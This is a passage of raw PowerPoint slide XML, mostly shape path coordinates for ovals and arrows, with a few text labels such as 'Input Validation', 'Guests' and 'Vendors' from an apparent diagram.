                  <a:lnTo>
                    <a:pt x="338589" y="69651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292918" y="89696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249844" y="111905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209549" y="136159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172219" y="162338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138037" y="190323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107188" y="219993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79854" y="251228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56221" y="283910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36472" y="317918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20791" y="353133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371" y="426703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="464819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371" y="502936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20791" y="576506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36472" y="611721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56221" y="645729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79854" y="678411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107188" y="709646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138037" y="739316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172219" y="767301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209550" y="793480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249844" y="817734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292918" y="839943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338589" y="859988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386672" y="877748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436983" y="893105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489338" y="905938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543553" y="916128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599444" y="923555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656827" y="928098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715518" y="929639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="774208" y="928098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="831591" y="923555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="887482" y="916128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941697" y="905938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994052" y="893105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044363" y="877748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092446" y="859988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138117" y="839943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181191" y="817734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221486" y="793480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258816" y="767301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1292998" y="739316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323847" y="709646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1351181" y="678411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374814" y="645729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394563" y="611721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1410244" y="576506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1428664" y="502936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1431036" y="464819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1428664" y="426703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1410244" y="353133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394563" y="317918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374814" y="283910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1351181" y="251228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323847" y="219993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1292998" y="190323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258816" y="162338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221486" y="136159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181191" y="111905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138117" y="89696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092446" y="69651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044363" y="51891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994052" y="36534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941697" y="23701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="887482" y="13511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="831591" y="6084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="774208" y="1541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7155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174742" y="3112770"/>
              <a:ext cx="1431290" cy="929640"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1431290" h="929639">
                  <a:moveTo>
                    <a:pt x="0" y="464819"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2371" y="426703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20791" y="353133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36472" y="317918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56221" y="283910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79854" y="251228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107188" y="219993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138037" y="190323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172219" y="162338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209549" y="136159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249844" y="111905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292918" y="89696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338589" y="69651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386672" y="51891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436983" y="36534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489338" y="23701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543553" y="13511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599444" y="6084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656827" y="1541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715518" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="774208" y="1541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="831591" y="6084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="887482" y="13511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941697" y="23701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994052" y="36534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044363" y="51891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092446" y="69651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138117" y="89696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181191" y="111905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221486" y="136159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258816" y="162338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1292998" y="190323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323847" y="219993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1351181" y="251228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374814" y="283910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394563" y="317918"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1410244" y="353133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1428664" y="426703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1431036" y="464819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1428664" y="502936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1410244" y="576506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394563" y="611721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1374814" y="645729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1351181" y="678411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323847" y="709646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1292998" y="739316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258816" y="767301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1221486" y="793480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181191" y="817734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138117" y="839943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092446" y="859988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1044363" y="877748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="994052" y="893105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="941697" y="905938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="887482" y="916128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="831591" y="923555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="774208" y="928098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715518" y="929639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="656827" y="928098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599444" y="923555"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543553" y="916128"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489338" y="905938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436983" y="893105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386672" y="877748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338589" y="859988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292918" y="839943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="249844" y="817734"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209550" y="793480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172219" y="767301"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138037" y="739316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107188" y="709646"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79854" y="678411"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56221" y="645729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36472" y="611721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20791" y="576506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2371" y="502936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="464819"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2895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513666" y="3339488"/>
            <a:ext cx="749740" cy="452637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13332" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12696" marR="5078" indent="170129" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-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400" spc="-80" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>alid</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>tion</a:t>
            </a:r>
            <a:endParaRPr sz="14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16229" y="3583645"/>
            <a:ext cx="1300141" cy="422955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28955">
            <a:solidFill>
              <a:srgbClr val="006FC0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="144742" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="331371" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="1140"/>
              </a:spcBef>
            </a:pP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Guests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14831" y="1356137"/>
            <a:ext cx="1300141" cy="422955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28955">
            <a:solidFill>
              <a:srgbClr val="006FC0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="144742" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="270429" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="1140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-20" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Vendors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89963" y="1937392"/>
            <a:ext cx="4984087" cy="3656648"/>
            <a:chOff x="3790950" y="1937004"/>
            <a:chExt cx="4985385" cy="3657600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3816603" y="1937004"/>
              <a:ext cx="2153285" cy="1041400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1991106" y="869188"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1977644" y="877824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1975612" y="886713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2074545" y="1040892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088253" y="1012063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2058162" y="1012063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2057056" y="994259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2048513" y="948125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2047681" y="945405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1999996" y="871093"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1991106" y="869188"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2064932" y="993648"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2057019" y="993648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2057273" y="995426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2057129" y="995426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2058162" y="1012063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087118" y="1010158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2086773" y="1004951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2059559" y="1004951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2064086" y="995426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2057273" y="995426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2057056" y="994259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2064641" y="994259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2064932" y="993648"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2135632" y="860044"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2126996" y="863092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2080362" y="961189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2085848" y="990981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2087118" y="1010158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2058162" y="1012063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2088253" y="1012063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2153158" y="875538"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2150110" y="866901"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2135632" y="860044"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2070765" y="981378"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2059559" y="1004951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084832" y="1003300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2070765" y="981378"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2080362" y="961189"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2070765" y="981378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084832" y="1003300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2059559" y="1004951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2086773" y="1004951"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2085848" y="990981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2080362" y="961189"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2057019" y="993648"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2057056" y="994259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2057273" y="995426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2057019" y="993648"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2048974" y="947420"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2048383" y="947420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2048764" y="948944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2057056" y="994259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2057019" y="993648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2064932" y="993648"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2070765" y="981378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2048974" y="947420"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2064498" y="901192"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2034159" y="901192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2034667" y="902588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2047681" y="945405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2070765" y="981378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2080362" y="961189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2076704" y="941324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2064498" y="901192"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2048513" y="948125"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2048665" y="948944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2048513" y="948125"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2048383" y="947420"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2048513" y="948125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2048764" y="948944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2048383" y="947420"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2047681" y="945405"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2048513" y="948125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2048383" y="947420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2048974" y="947420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2047681" y="945405"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2034374" y="901896"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2034586" y="902588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2034374" y="901896"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2034159" y="901192"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2034374" y="901896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2034667" y="902588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2034159" y="901192"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2046071" y="855091"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2014601" y="855091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015236" y="856361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2034374" y="901896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2034159" y="901192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2064498" y="901192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2061718" y="892048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2046071" y="855091"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2014784" y="855525"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2015137" y="856361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014784" y="855525"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2014601" y="855091"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2014784" y="855525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015236" y="856361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014601" y="855091"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="2022655" y="809117"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1989709" y="809117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1990344" y="810260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014784" y="855525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014601" y="855091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2046071" y="855091"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2041017" y="843153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022655" y="809117"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1990242" y="810104"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1990326" y="810260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1990242" y="810104"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1989709" y="809117"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1990242" y="810104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1990344" y="810260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989709" y="809117"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1994403" y="763524"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1959864" y="763524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1960499" y="764413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1990242" y="810104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1989709" y="809117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2022655" y="809117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2014982" y="794893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994403" y="763524"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1960134" y="763938"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1960443" y="764413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1960134" y="763938"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1959864" y="763524"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1960134" y="763938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1960499" y="764413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1959864" y="763524"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1961514" y="718312"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1925066" y="718312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1925701" y="719074"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1960134" y="763938"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1959864" y="763524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994403" y="763524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1983740" y="747268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1961514" y="718312"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2153285" h="1041400">
                  <a:moveTo>
                    <a:pt x="1925327" y="718651"/>
                  </a:moveTo>
                  <a:lnTo>
